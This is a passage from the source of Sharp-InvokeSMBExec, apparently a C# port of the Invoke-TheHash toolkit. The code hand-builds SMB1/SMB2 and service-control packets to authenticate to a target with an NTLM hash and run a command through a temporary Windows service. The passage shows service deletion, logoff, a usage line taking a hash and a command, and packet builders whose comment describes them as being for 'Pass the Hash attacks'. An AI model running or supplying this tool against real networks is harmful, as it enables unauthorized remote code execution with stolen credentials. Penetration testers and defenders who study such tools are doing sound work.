else if (BitConverter.ToString(Utilities.GetByteRange(SMBClientReceive, 108, 111)) == "02-00-00-00")
{
output.AppendLine(String.Format("Service {0} failed to start on {1}", SMB_Service, Target));
}
SMB2_Message_ID += 20;
Packet_SMB2_Header = SMBExec.SMB2Header(new byte[] { 0x09, 0x00 }, SMB2_Message_ID, SMB2_Tree_ID, SMB_Session_ID);
Packet_SMB2_Header["SMB2Header_CreditRequest"] = new byte[] { 0x7f, 0x00 };
if (SMB_Signing)
{
Packet_SMB2_Header["SMB2Header_Flags"] = new byte[] { 0x08, 0x00, 0x00, 0x00 };
}
Packet_SCM_Data = SMBExec.SCMDeleteServiceW(SMB_Service_Context_Handle);
SCM_Data = Utilities.ConvertFromPacketOrderedDictionary(Packet_SCM_Data);
Packet_RPC_Data = SMBExec.RPCRequest(new byte[] { 0x03 }, SCM_Data.Length, 0, 0, new byte[] { 0x01, 0x00, 0x00, 0x00 }, new byte[] { 0x00, 0x00 }, new byte[] { 0x02, 0x00 }, null);
RPC_Data = Utilities.ConvertFromPacketOrderedDictionary(Packet_RPC_Data);
Packet_SMB2_Data = SMBExec.SMB2WriteRequest(SMB_File_ID, RPC_Data.Length + SCM_Data.Length);
SMB2_Header = Utilities.ConvertFromPacketOrderedDictionary(Packet_SMB2_Header);
SMB2_Data = Utilities.ConvertFromPacketOrderedDictionary(Packet_SMB2_Data);
int RPC_Data_Length = SMB2_Data.Length + SCM_Data.Length + RPC_Data.Length;
NetBIOS_Session_Service = GetNetBIOSSessionService(SMB2_Header.Length, RPC_Data_Length);
if (SMB_Signing)
{
HMAC_SHA256 = new HMACSHA256();
SMB2_Sign = SMB2_Header.Concat(SMB2_Data).Concat(RPC_Data).Concat(SCM_Data).ToArray();
SMB2_Signature = HMAC_SHA256.ComputeHash(SMB2_Sign);
SMB2_Signature = Utilities.GetByteRange(SMB2_Signature, 0, 15);
Packet_SMB2_Header["SMB2Header_Signature"] = SMB2_Signature;
SMB2_Header = Utilities.ConvertFromPacketOrderedDictionary(Packet_SMB2_Header);
}
SMB_Client_Send = NetBIOS_Session_Service.Concat(SMB2_Header).Concat(SMB2_Data).Concat(RPC_Data).Concat(SCM_Data).ToArray();
SMBClientReceive = SendStream(SMBClientStream, SMB_Client_Send);
SMBClientStage = "ReadRequest";
SMB_Client_Stage_Next = "CloseServiceHandle";
SMB_Close_Service_Handle_Stage = 1;
}
break;
case "CloseServiceHandle":
{
if (SMB_Close_Service_Handle_Stage == 1)
{
if (debug) { output.AppendLine(String.Format("Service {0} deleted on {1}", SMB_Service, Target)); }
Service_Deleted = true;
SMB2_Message_ID += 20;
SMB_Close_Service_Handle_Stage++;
Packet_SCM_Data = SMBExec.SCMCloseServiceHandle(SMB_Service_Context_Handle);
}
else
{
SMB2_Message_ID++;
SMBClientStage = "CloseRequest";
Packet_SCM_Data = SMBExec.SCMCloseServiceHandle(SMB_Service_Manager_Context_Handle);
}
if (SMB_Signing)
{
Packet_SMB2_Header["SMB2Header_Flags"] = new byte[] { 0x08, 0x00, 0x00, 0x00 };
}
Packet_SMB2_Header = SMBExec.SMB2Header(new byte[] { 0x09, 0x00 }, SMB2_Message_ID, SMB2_Tree_ID, SMB_Session_ID);
Packet_SMB2_Header["SMB2Header_CreditRequest"] = new byte[] { 0x7f, 0x00 };
SCM_Data = Utilities.ConvertFromPacketOrderedDictionary(Packet_SCM_Data);
Packet_RPC_Data = SMBExec.RPCRequest(new byte[] { 0x03 }, SCM_Data.Length, 0, 0, new byte[] { 0x01, 0x00, 0x00, 0x00 }, new byte[] { 0x00, 0x00 }, new byte[] { 0x02, 0x00 }, null);
RPC_Data = Utilities.ConvertFromPacketOrderedDictionary(Packet_RPC_Data);
Packet_SMB2_Data = SMBExec.SMB2WriteRequest(SMB_File_ID, RPC_Data.Length + SCM_Data.Length);
SMB2_Header = Utilities.ConvertFromPacketOrderedDictionary(Packet_SMB2_Header);
SMB2_Data = Utilities.ConvertFromPacketOrderedDictionary(Packet_SMB2_Data);
int RPC_Data_Length = SMB2_Data.Length + SCM_Data.Length + RPC_Data.Length;
NetBIOS_Session_Service = GetNetBIOSSessionService(SMB2_Header.Length, RPC_Data_Length);
if (SMB_Signing)
{
HMAC_SHA256 = new HMACSHA256();
SMB2_Sign = SMB2_Header.Concat(SMB2_Data).Concat(RPC_Data).Concat(SCM_Data).ToArray();
SMB2_Signature = HMAC_SHA256.ComputeHash(SMB2_Sign);
SMB2_Signature = Utilities.GetByteRange(SMB2_Signature, 0, 15);
Packet_SMB2_Header["SMB2Header_Signature"] = SMB2_Signature;
SMB2_Header = Utilities.ConvertFromPacketOrderedDictionary(Packet_SMB2_Header);
}
SMB_Client_Send = NetBIOS_Session_Service.Concat(SMB2_Header).Concat(SMB2_Data).Concat(RPC_Data).Concat(SCM_Data).ToArray();
SMBClientReceive = SendStream(SMBClientStream, SMB_Client_Send);
}
break;
case "CloseRequest":
{
SMB2_Message_ID += 20;
Packet_SMB2_Header = SMBExec.SMB2Header(new byte[] { 0x06, 0x00 }, SMB2_Message_ID, SMB2_Tree_ID, SMB_Session_ID);
Packet_SMB2_Header["SMB2Header_CreditRequest"] = new byte[] { 0x7f, 0x00 };
if (SMB_Signing)
{
Packet_SMB2_Header["SMB2Header_Flags"] = new byte[] { 0x08, 0x00, 0x00, 0x00 };
}
SMB2_Header = Utilities.ConvertFromPacketOrderedDictionary(Packet_SMB2_Header);
SMB2_Data = Utilities.ConvertFromPacketOrderedDictionary(Packet_SMB2_Data);
NetBIOS_Session_Service = GetNetBIOSSessionService(SMB2_Header.Length, SMB2_Data.Length);
if (SMB_Signing)
{
HMAC_SHA256 = new HMACSHA256();
SMB2_Sign = SMB2_Header.Concat(SMB2_Data).ToArray();
SMB2_Signature = HMAC_SHA256.ComputeHash(SMB2_Sign);
SMB2_Signature = Utilities.GetByteRange(SMB2_Signature, 0, 15);
Packet_SMB2_Header["SMB2Header_Signature"] = SMB2_Signature;
SMB2_Header = Utilities.ConvertFromPacketOrderedDictionary(Packet_SMB2_Header);
}
SMB_Client_Send = NetBIOS_Session_Service.Concat(SMB2_Header).Concat(SMB2_Data).ToArray();
SMBClientReceive = SendStream(SMBClientStream, SMB_Client_Send);
SMBClientStage = "TreeDisconnect";
}
break;
case "TreeDisconnect":
{
SMB2_Message_ID++;
Packet_SMB2_Header = SMBExec.SMB2Header(new byte[] { 0x04, 0x00 }, SMB2_Message_ID, SMB2_Tree_ID, SMB_Session_ID);
Packet_SMB2_Header["SMB2Header_CreditRequest"] = new byte[] { 0x7f, 0x00 };
if (SMB_Signing)
{
Packet_SMB2_Header["SMB2Header_Flags"] = new byte[] { 0x08, 0x00, 0x00, 0x00 };
}
Packet_SMB2_Data = SMBExec.SMB2TreeDisconnectRequest();
SMB2_Header = Utilities.ConvertFromPacketOrderedDictionary(Packet_SMB2_Header);
SMB2_Data = Utilities.ConvertFromPacketOrderedDictionary(Packet_SMB2_Data);
NetBIOS_Session_Service = GetNetBIOSSessionService(SMB2_Header.Length, SMB2_Data.Length);
if (SMB_Signing)
{
HMAC_SHA256 = new HMACSHA256();
SMB2_Sign = SMB2_Header.Concat(SMB2_Data).ToArray();
SMB2_Signature = HMAC_SHA256.ComputeHash(SMB2_Sign);
SMB2_Signature = Utilities.GetByteRange(SMB2_Signature, 0, 15);
Packet_SMB2_Header["SMB2Header_Signature"] = SMB2_Signature;
SMB2_Header = Utilities.ConvertFromPacketOrderedDictionary(Packet_SMB2_Header);
}
SMB_Client_Send = NetBIOS_Session_Service.Concat(SMB2_Header).Concat(SMB2_Data).ToArray();
SMBClientReceive = SendStream(SMBClientStream, SMB_Client_Send);
SMBClientStage = "Logoff";
}
break;
case "Logoff":
{
SMB2_Message_ID += 20;
Packet_SMB2_Header = SMBExec.SMB2Header(new byte[] { 0x02, 0x00 }, SMB2_Message_ID, SMB2_Tree_ID, SMB_Session_ID);
Packet_SMB2_Header["SMB2Header_CreditRequest"] = new byte[] { 0x7f, 0x00 };
if (SMB_Signing)
{
Packet_SMB2_Header["SMB2Header_Flags"] = new byte[] { 0x08, 0x00, 0x00, 0x00 };
}
Packet_SMB2_Data = SMBExec.SMB2SessionLogoffRequest();
SMB2_Header = Utilities.ConvertFromPacketOrderedDictionary(Packet_SMB2_Header);
SMB2_Data = Utilities.ConvertFromPacketOrderedDictionary(Packet_SMB2_Data);
NetBIOS_Session_Service = GetNetBIOSSessionService(SMB2_Header.Length, SMB2_Data.Length);
if (SMB_Signing)
{
HMAC_SHA256 = new HMACSHA256();
SMB2_Sign = SMB2_Header.Concat(SMB2_Data).ToArray();
SMB2_Signature = HMAC_SHA256.ComputeHash(SMB2_Sign);
SMB2_Signature = Utilities.GetByteRange(SMB2_Signature, 0, 15);
Packet_SMB2_Header["SMB2Header_Signature"] = SMB2_Signature;
SMB2_Header = Utilities.ConvertFromPacketOrderedDictionary(Packet_SMB2_Header);
}
SMB_Client_Send = NetBIOS_Session_Service.Concat(SMB2_Header).Concat(SMB2_Data).ToArray();
SMBClientReceive = SendStream(SMBClientStream, SMB_Client_Send);
SMBClientStage = "exit";
}
break;
}
}
}
if (!Service_Deleted && !AdminCheck)
{
output.AppendLine("Warning: Service not deleted. Please delete Service \"" + SMB_Service + "\" manually.");
}
}
SMBClient.Close();
SMBClientStream.Close();
}
Console.WriteLine(output.ToString());
}
public static void displayHelp(string message)
{
Console.WriteLine("{0} \r\nSharp-InvokeSMBxec.exe username:<user> domain:<domain> hash:<ntlm> target:<target> command:<command>", message);
Environment.Exit(-1);
}
private static byte[] SendStream(NetworkStream stream, byte[] BytesToSend)
{
byte[] BytesReceived = new byte[2048];
stream.Write(BytesToSend, 0, BytesToSend.Length);
stream.Flush();
stream.Read(BytesReceived, 0, BytesReceived.Length);
return BytesReceived;
}
private static byte[] GetNetBIOSSessionService(int SMB_Header_Length, int RPC_Data_Length)
{
OrderedDictionary Packet_NetBIOS_Session_Service = SMBExec.NetBIOSSessionService(SMB_Header_Length, RPC_Data_Length);
byte[] NetBIOS_Session_Service = Utilities.ConvertFromPacketOrderedDictionary(Packet_NetBIOS_Session_Service);
return NetBIOS_Session_Service;
}
}
}
================================================
FILE: Sharp-SMBExec/SharpInvoke-SMBExec/Properties/AssemblyInfo.cs
================================================
using System.Reflection;
using System.Runtime.CompilerServices;
using System.Runtime.InteropServices;
// General Information about an assembly is controlled through the following
// set of attributes. Change these attribute values to modify the information
// associated with an assembly.
[assembly: AssemblyTitle("SharpInvoke-SMBExec")]
[assembly: AssemblyDescription("")]
[assembly: AssemblyConfiguration("")]
[assembly: AssemblyCompany("")]
[assembly: AssemblyProduct("SharpInvoke-SMBExec")]
[assembly: AssemblyCopyright("Copyright © 2017")]
[assembly: AssemblyTrademark("")]
[assembly: AssemblyCulture("")]
// Setting ComVisible to false makes the types in this assembly not visible
// to COM components. If you need to access a type in this assembly from
// COM, set the ComVisible attribute to true on that type.
[assembly: ComVisible(false)]
// The following GUID is for the ID of the typelib if this project is exposed to COM
[assembly: Guid("344ee55a-4e32-46f2-a003-69ad52b55945")]
// Version information for an assembly consists of the following four values:
//
// Major Version
// Minor Version
// Build Number
// Revision
//
// You can specify all the values or you can default the Build and Revision Numbers
// by using the '*' as shown below:
// [assembly: AssemblyVersion("1.0.*")]
[assembly: AssemblyVersion("1.0.0.0")]
[assembly: AssemblyFileVersion("1.0.0.0")]
================================================
FILE: Sharp-SMBExec/SharpInvoke-SMBExec/SMBExec.cs
================================================
using System;
using System.Collections.Specialized;
using System.Linq;
namespace SharpInvoke_SMBExec
{
public class SMBExec
{
/// <summary>
/// SMBExec contains all of the functions used to manually create SMB Packet Structures for Pass the Hash attacks.
/// </summary>
/// <remarks>
/// Based Heavily on Kevin Robertsons Invoke-TheHash toolset (Found
/// at https://github.com/Kevin-Robertson/Invoke-TheHash)
/// </remarks>
#region SMBv1
public static OrderedDictionary NetBIOSSessionService(int packet_header_length, int packet_data_length)
{
byte[] packet_netbios_session_service_length = BitConverter.GetBytes(packet_header_length + packet_data_length);
packet_netbios_session_service_length = new byte[] { packet_netbios_session_service_length[2], packet_netbios_session_service_length[1], packet_netbios_session_service_length[0] };
OrderedDictionary packet_NetBIOSSessionService = new OrderedDictionary();
packet_NetBIOSSessionService.Add("NetBIOSSessionService_Message_Type", new byte[] { 0x00 });
packet_NetBIOSSessionService.Add("NetBIOSSessionService_Length", packet_netbios_session_service_length);
return packet_NetBIOSSessionService;
}
public static OrderedDictionary SMBHeader(byte[] packet_command, byte[] packet_flags, byte[] packet_flags2, byte[] packet_tree_ID, byte[] packet_process_ID, byte[] packet_user_ID)
{
byte[] ProcessID = new byte[2] { packet_process_ID[0], packet_process_ID[1] };
OrderedDictionary packet_SMBHeader = new OrderedDictionary();
packet_SMBHeader.Add("SMBHeader_Protocol", new byte[] { 0xff, 0x53, 0x4d, 0x42 });
packet_SMBHeader.Add("SMBHeader_Command", packet_command);
packet_SMBHeader.Add("SMBHeader_ErrorClass", new byte[] { 0x00 });
packet_SMBHeader.Add("SMBHeader_Reserved", new byte[] { 0x00 });
packet_SMBHeader.Add("SMBHeader_ErrorCode", new byte[] { 0x00, 0x00 });
packet_SMBHeader.Add("SMBHeader_Flags", packet_flags);
packet_SMBHeader.Add("SMBHeader_Flags2", packet_flags2);
packet_SMBHeader.Add("SMBHeader_ProcessIDHigh", new byte[] { 0x00, 0x00 });
packet_SMBHeader.Add("SMBHeader_Signature", new byte[] { 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 });
packet_SMBHeader.Add("SMBHeader_Reserved2", new byte[] { 0x00, 0x00 });
packet_SMBHeader.Add("SMBHeader_TreeID", packet_tree_ID);
packet_SMBHeader.Add("SMBHeader_ProcessID", ProcessID);
packet_SMBHeader.Add("SMBHeader_UserID", packet_user_ID);
packet_SMBHeader.Add("SMBHeader_MultiplexID", new byte[] { 0x00, 0x00 });
return packet_SMBHeader;
}
public static OrderedDictionary SMBNegotiateProtocolRequest(bool ForceSMB1)
{
byte[] packet_byte_count;
if (ForceSMB1)
{
packet_byte_count = new byte[] { 0x0c, 0x00 };
}
else
{
packet_byte_count = new byte[] { 0x22, 0x00 };
}
//https://msdn.microsoft.com/en-us/library/ee441572.aspx
OrderedDictionary packet_SMBNegotiateProtocolRequest = new OrderedDictionary();
packet_SMBNegotiateProtocolRequest.Add("SMBNegotiateProtocolRequest_WordCount", new byte[] { 0x00 });
packet_SMBNegotiateProtocolRequest.Add("SMBNegotiateProtocolRequest_ByteCount", packet_byte_count);
packet_SMBNegotiateProtocolRequest.Add("SMBNegotiateProtocolRequest_RequestedDialects_Dialect_BufferFormat", new byte[] { 0x02 });
packet_SMBNegotiateProtocolRequest.Add("SMBNegotiateProtocolRequest_RequestedDialects_Dialect_Name", new byte[] { 0x4e, 0x54, 0x20, 0x4c, 0x4d, 0x20, 0x30, 0x2e, 0x31, 0x32, 0x00 });
if (!ForceSMB1)
{
packet_SMBNegotiateProtocolRequest.Add("SMBNegotiateProtocolRequest_RequestedDialects_Dialect_BufferFormat2", new byte[] { 0x02 });
packet_SMBNegotiateProtocolRequest.Add("SMBNegotiateProtocolRequest_RequestedDialects_Dialect_Name2", new byte[] { 0x53, 0x4d, 0x42, 0x20, 0x32, 0x2e, 0x30, 0x30, 0x32, 0x00 });
packet_SMBNegotiateProtocolRequest.Add("SMBNegotiateProtocolRequest_RequestedDialects_Dialect_BufferFormat3", new byte[] { 0x02 });
packet_SMBNegotiateProtocolRequest.Add("SMBNegotiateProtocolRequest_RequestedDialects_Dialect_Name3", new byte[] { 0x53, 0x4d, 0x42, 0x20, 0x32, 0x2e, 0x3f, 0x3f, 0x3f, 0x00 });
}
return packet_SMBNegotiateProtocolRequest;
}
public static OrderedDictionary SMBSessionSetupAndXRequest(byte[] packet_security_blob)
{
//https://msdn.microsoft.com/en-us/library/ee441849.aspx
byte[] packet_byte_count = BitConverter.GetBytes(packet_security_blob.Length);
byte[] packet_byte_count2 = { packet_byte_count[0], packet_byte_count[1] };
byte[] packet_security_blob_length = BitConverter.GetBytes(packet_security_blob.Length + 5);
byte[] packet_security_blob_length2 = { packet_security_blob_length[0], packet_security_blob_length[1] };
OrderedDictionary packet_SMBSessionSetupAndXRequest = new OrderedDictionary();
packet_SMBSessionSetupAndXRequest.Add("SMBSessionSetupAndXRequest_WordCount", new byte[] { 0x0c });
packet_SMBSessionSetupAndXRequest.Add("SMBSessionSetupAndXRequest_AndXCommand", new byte[] { 0xff });
packet_SMBSessionSetupAndXRequest.Add("SMBSessionSetupAndXRequest_Reserved", new byte[] { 0x00 });
packet_SMBSessionSetupAndXRequest.Add("SMBSessionSetupAndXRequest_AndXOffset", new byte[] { 0x00, 0x00 });
packet_SMBSessionSetupAndXRequest.Add("SMBSessionSetupAndXRequest_MaxBuffer", new byte[] { 0xff, 0xff });
packet_SMBSessionSetupAndXRequest.Add("SMBSessionSetupAndXRequest_MaxMpxCount", new byte[] { 0x02, 0x00 });
packet_SMBSessionSetupAndXRequest.Add("SMBSessionSetupAndXRequest_VCNumber", new byte[] { 0x01, 0x00 });
packet_SMBSessionSetupAndXRequest.Add("SMBSessionSetupAndXRequest_SessionKey", new byte[] { 0x00, 0x00, 0x00, 0x00 });
packet_SMBSessionSetupAndXRequest.Add("SMBSessionSetupAndXRequest_SecurityBlobLength", packet_byte_count2);
packet_SMBSessionSetupAndXRequest.Add("SMBSessionSetupAndXRequest_Reserved2", new byte[] { 0x00, 0x00, 0x00, 0x00 });
packet_SMBSessionSetupAndXRequest.Add("SMBSessionSetupAndXRequest_Capabilities", new byte[] { 0x44, 0x00, 0x00, 0x80 });
packet_SMBSessionSetupAndXRequest.Add("SMBSessionSetupAndXRequest_ByteCount", packet_security_blob_length2);
packet_SMBSessionSetupAndXRequest.Add("SMBSessionSetupAndXRequest_SecurityBlob", packet_security_blob);
packet_SMBSessionSetupAndXRequest.Add("SMBSessionSetupAndXRequest_NativeOS", new byte[] { 0x00, 0x00, 0x00 });
packet_SMBSessionSetupAndXRequest.Add("SMBSessionSetupAndXRequest_NativeLANManage", new byte[] { 0x00, 0x00 });
return packet_SMBSessionSetupAndXRequest;
}
public static OrderedDictionary SMBTreeConnectAndXRequest(byte[] packet_path)
{
byte[] packet_path_length = BitConverter.GetBytes(packet_path.Length + 7);
packet_path_length = new byte[] { packet_path_length[0], packet_path_length[1] };
OrderedDictionary packet_SMBTreeConnectAndXRequest = new OrderedDictionary();
packet_SMBTreeConnectAndXRequest.Add("SMBTreeConnectAndXRequest_WordCount", new byte[] { 0x04 });
packet_SMBTreeConnectAndXRequest.Add("SMBTreeConnectAndXRequest_AndXCommand", new byte[] { 0xff });
packet_SMBTreeConnectAndXRequest.Add("SMBTreeConnectAndXRequest_Reserved", new byte[] { 0x00 });
packet_SMBTreeConnectAndXRequest.Add("SMBTreeConnectAndXRequest_AndXOffset", new byte[] { 0x00, 0x00 });
packet_SMBTreeConnectAndXRequest.Add("SMBTreeConnectAndXRequest_Flags", new byte[] { 0x00, 0x00 });
packet_SMBTreeConnectAndXRequest.Add("SMBTreeConnectAndXRequest_PasswordLength", new byte[] { 0x01, 0x00 });
packet_SMBTreeConnectAndXRequest.Add("SMBTreeConnectAndXRequest_ByteCount", packet_path_length);
packet_SMBTreeConnectAndXRequest.Add("SMBTreeConnectAndXRequest_Password", new byte[] { 0x00 });
packet_SMBTreeConnectAndXRequest.Add("SMBTreeConnectAndXRequest_Tree", packet_path);
packet_SMBTreeConnectAndXRequest.Add("SMBTreeConnectAndXRequest_Service", new byte[] { 0x3f, 0x3f, 0x3f, 0x3f, 0x3f, 0x00 });
return packet_SMBTreeConnectAndXRequest;
}
public static OrderedDictionary SMBNTCreateAndXRequest(byte[] packet_named_pipe)
{
byte[] packet_named_pipe_length = BitConverter.GetBytes(packet_named_pipe.Length);
byte[] packet_named_pipe_length2 = { packet_named_pipe_length[0], packet_named_pipe_length[1] };
byte[] packet_file_name_length = BitConverter.GetBytes(packet_named_pipe.Length - 1);
byte[] packet_file_name_length2 = { packet_file_name_length[0], packet_file_name_length[1] };
OrderedDictionary packet_SMBNTCreateAndXRequest = new OrderedDictionary();
packet_SMBNTCreateAndXRequest.Add("SMBNTCreateAndXRequest_WordCount", new byte[] { 0x18 });
packet_SMBNTCreateAndXRequest.Add("SMBNTCreateAndXRequest_AndXCommand", new byte[] { 0xff });
packet_SMBNTCreateAndXRequest.Add("SMBNTCreateAndXRequest_Reserved", new byte[] { 0x00 });
packet_SMBNTCreateAndXRequest.Add("SMBNTCreateAndXRequest_AndXOffset", new byte[] { 0x00, 0x00 });
packet_SMBNTCreateAndXRequest.Add("SMBNTCreateAndXRequest_Reserved2", new byte[] { 0x00 });
packet_SMBNTCreateAndXRequest.Add("SMBNTCreateAndXRequest_FileNameLen", packet_file_name_length2);
packet_SMBNTCreateAndXRequest.Add("SMBNTCreateAndXRequest_CreateFlags", new byte[] { 0x16, 0x00, 0x00, 0x00 });
packet_SMBNTCreateAndXRequest.Add("SMBNTCreateAndXRequest_RootFID", new byte[] { 0x00, 0x00, 0x00, 0x00 });
packet_SMBNTCreateAndXRequest.Add("SMBNTCreateAndXRequest_AccessMask", new byte[] { 0x00, 0x00, 0x00, 0x02 });
packet_SMBNTCreateAndXRequest.Add("SMBNTCreateAndXRequest_AllocationSize", new byte[] { 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 });
packet_SMBNTCreateAndXRequest.Add("SMBNTCreateAndXRequest_FileAttributes", new byte[] { 0x00, 0x00, 0x00, 0x00 });
packet_SMBNTCreateAndXRequest.Add("SMBNTCreateAndXRequest_ShareAccess", new byte[] { 0x07, 0x00, 0x00, 0x00 });
packet_SMBNTCreateAndXRequest.Add("SMBNTCreateAndXRequest_Disposition", new byte[] { 0x01, 0x00, 0x00, 0x00 });
packet_SMBNTCreateAndXRequest.Add("SMBNTCreateAndXRequest_CreateOptions", new byte[] { 0x00, 0x00, 0x00, 0x00 });
packet_SMBNTCreateAndXRequest.Add("SMBNTCreateAndXRequest_Impersonation", new byte[] { 0x02, 0x00, 0x00, 0x00 });
packet_SMBNTCreateAndXRequest.Add("SMBNTCreateAndXRequest_SecurityFlags", new byte[] { 0x00 });
packet_SMBNTCreateAndXRequest.Add("SMBNTCreateAndXRequest_ByteCount", packet_named_pipe_length2);
packet_SMBNTCreateAndXRequest.Add("SMBNTCreateAndXRequest_Filename", packet_named_pipe);
return packet_SMBNTCreateAndXRequest;
}
public static OrderedDictionary SMBReadAndXRequest(byte[] SMB_FID)
{
if (SMB_FID == null)
{
SMB_FID = new byte[] { 0x00, 0x40 };
}
OrderedDictionary packet_SMBReadAndXRequest = new OrderedDictionary();
packet_SMBReadAndXRequest.Add("SMBReadAndXRequest_WordCount", new byte[] { 0x0a });
packet_SMBReadAndXRequest.Add("SMBReadAndXRequest_AndXCommand", new byte[] { 0xff });
packet_SMBReadAndXRequest.Add("SMBReadAndXRequest_Reserved", new byte[] { 0x00 });
packet_SMBReadAndXRequest.Add("SMBReadAndXRequest_AndXOffset", new byte[] { 0x00, 0x00 });
packet_SMBReadAndXRequest.Add("SMBReadAndXRequest_FID", SMB_FID);
packet_SMBReadAndXRequest.Add("SMBReadAndXRequest_Offset", new byte[] { 0x00, 0x00, 0x00, 0x00 });
packet_SMBReadAndXRequest.Add("SMBReadAndXRequest_MaxCountLow", new byte[] { 0x58, 0x02 });
packet_SMBReadAndXRequest.Add("SMBReadAndXRequest_MinCount", new byte[] { 0x58, 0x02 });
packet_SMBReadAndXRequest.Add("SMBReadAndXRequest_Unknown", new byte[] { 0xff, 0xff, 0xff, 0xff });
packet_SMBReadAndXRequest.Add("SMBReadAndXRequest_Remaining", new byte[] { 0x00, 0x00 });
packet_SMBReadAndXRequest.Add("SMBReadAndXRequest_ByteCount", new byte[] { 0x00, 0x00 });
return packet_SMBReadAndXRequest;
}
public static OrderedDictionary SMBWriteAndXRequest(byte[] packet_file_ID, int packet_RPC_length)
{
byte[] packet_write_length = BitConverter.GetBytes(packet_RPC_length);
packet_write_length = new byte[] { packet_write_length[0], packet_write_length[1] };
OrderedDictionary packet_SMBWriteAndXRequest = new OrderedDictionary();
packet_SMBWriteAndXRequest.Add("SMBWriteAndXRequest_WordCount", new byte[] { 0x0e });
packet_SMBWriteAndXRequest.Add("SMBWriteAndXRequest_AndXCommand", new byte[] { 0xff });
packet_SMBWriteAndXRequest.Add("SMBWriteAndXRequest_Reserved", new byte[] { 0x00 });
packet_SMBWriteAndXRequest.Add("SMBWriteAndXRequest_AndXOffset", new byte[] { 0x00, 0x00 });
packet_SMBWriteAndXRequest.Add("SMBWriteAndXRequest_FID", packet_file_ID);
packet_SMBWriteAndXRequest.Add("SMBWriteAndXRequest_Offset", new byte[] { 0xea, 0x03, 0x00, 0x00 });
packet_SMBWriteAndXRequest.Add("SMBWriteAndXRequest_Reserved2", new byte[] { 0xff, 0xff, 0xff, 0xff });
packet_SMBWriteAndXRequest.Add("SMBWriteAndXRequest_WriteMode", new byte[] { 0x08, 0x00 });
packet_SMBWriteAndXRequest.Add("SMBWriteAndXRequest_Remaining", packet_write_length);
packet_SMBWriteAndXRequest.Add("SMBWriteAndXRequest_DataLengthHigh", new byte[] { 0x00, 0x00 });
packet_SMBWriteAndXRequest.Add("SMBWriteAndXRequest_DataLengthLow", packet_write_length);
packet_SMBWriteAndXRequest.Add("SMBWriteAndXRequest_DataOffset", new byte[] { 0x3f, 0x00 });
packet_SMBWriteAndXRequest.Add("SMBWriteAndXRequest_HighOffset", new byte[] { 0x00, 0x00, 0x00, 0x00 });
packet_SMBWriteAndXRequest.Add("SMBWriteAndXRequest_ByteCount", packet_write_length);
return packet_SMBWriteAndXRequest;
}
public static OrderedDictionary SMBCloseRequest(byte[] packet_file_ID)
{
OrderedDictionary packet_SMBCloseRequest = new OrderedDictionary();
packet_SMBCloseRequest.Add("SMBCloseRequest_WordCount", new byte[] { 0x03 });
packet_SMBCloseRequest.Add("SMBCloseRequest_FID", packet_file_ID);
packet_SMBCloseRequest.Add("SMBCloseRequest_LastWrite", new byte[] { 0xff, 0xff, 0xff, 0xff });
packet_SMBCloseRequest.Add("SMBCloseRequest_ByteCount", new byte[] { 0x00, 0x00 });
return packet_SMBCloseRequest;
}
public static OrderedDictionary SMBTreeDisconnectRequest()
{
OrderedDictionary packet_SMBTreeDisconnectRequest = new OrderedDictionary();
packet_SMBTreeDisconnectRequest.Add("SMBTreeDisconnectRequest_WordCount", new byte[] { 0x00 });
packet_SMBTreeDisconnectRequest.Add("SMBTreeDisconnectRequest_ByteCount", new byte[] { 0x00, 0x00 });
return packet_SMBTreeDisconnectRequest;
}
public static OrderedDictionary SMBLogoffAndXRequest()
{
OrderedDictionary packet_SMBLogoffAndXRequest = new OrderedDictionary();
packet_SMBLogoffAndXRequest.Add("SMBLogoffAndXRequest_WordCount", new byte[] { 0x02 });
packet_SMBLogoffAndXRequest.Add("SMBLogoffAndXRequest_AndXCommand", new byte[] { 0xff });
packet_SMBLogoffAndXRequest.Add("SMBLogoffAndXRequest_Reserved", new byte[] { 0x00 });
packet_SMBLogoffAndXRequest.Add("SMBLogoffAndXRequest_AndXOffset", new byte[] { 0x00, 0x00 });
packet_SMBLogoffAndXRequest.Add("SMBLogoffAndXRequest_ByteCount", new byte[] { 0x00, 0x00 });
return packet_SMBLogoffAndXRequest;
}
#endregion
#region SMBv2
//public static OrderedDictionary SMB2Header(byte[] packet_command,bool SMB_signing, int packet_message_ID, byte[] process_id, byte[] packet_tree_ID, byte[] packet_session_ID)
public static OrderedDictionary SMB2Header(byte[] packet_command, int packet_message_ID, byte[] packet_tree_ID, byte[] packet_session_ID)
{
byte[] message_ID = BitConverter.GetBytes(packet_message_ID);
if (message_ID.Length == 4)
{
message_ID = message_ID.Concat(new byte[] { 0x00, 0x00, 0x00, 0x00 }).ToArray();
//message_ID = Utilities.CombineByteArray(message_ID, new byte[] { 0x00, 0x00, 0x00, 0x00 });
}
OrderedDictionary packet_SMB2Header = new OrderedDictionary();
packet_SMB2Header.Add("SMB2Header_ProtocolID", new byte[] { 0xfe, 0x53, 0x4d, 0x42 });
packet_SMB2Header.Add("SMB2Header_StructureSize", new byte[] { 0x40, 0x00 });
packet_SMB2Header.Add("SMB2Header_CreditCharge", new byte[] { 0x01, 0x00 });
packet_SMB2Header.Add("SMB2Header_ChannelSequence", new byte[] { 0x00, 0x00 });
packet_SMB2Header.Add("SMB2Header_Reserved", new byte[] { 0x00, 0x00 });
packet_SMB2Header.Add("SMB2Header_Command", packet_command);
packet_SMB2Header.Add("SMB2Header_CreditRequest", new byte[] { 0x00, 0x00 });
packet_SMB2Header.Add("SMB2Header_Flags", new byte[] { 0x00, 0x00, 0x00, 0x00 });
packet_SMB2Header.Add("SMB2Header_NextCommand", new byte[] { 0x00, 0x00, 0x00, 0x00 });
packet_SMB2Header.Add("SMB2Header_MessageID", message_ID);
packet_SMB2Header.Add("SMB2Header_Reserved2", new byte[] { 0x00, 0x00, 0x00, 0x00 });
packet_SMB2Header.Add("SMB2Header_TreeID", packet_tree_ID);
packet_SMB2Header.Add("SMB2Header_SessionID", packet_session_ID);
packet_SMB2Header.Add("SMB2Header_Signature", new byte[] { 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 });
return packet_SMB2Header;
}
public static OrderedDictionary SMB2NegotiateProtocolRequest()
{
OrderedDictionary packet_SMB2NegotiateProtocolRequest = new OrderedDictionary();
packet_SMB2NegotiateProtocolRequest.Add("SMB2NegotiateProtocolRequest_StructureSize", new byte[] { 0x24, 0x00 });
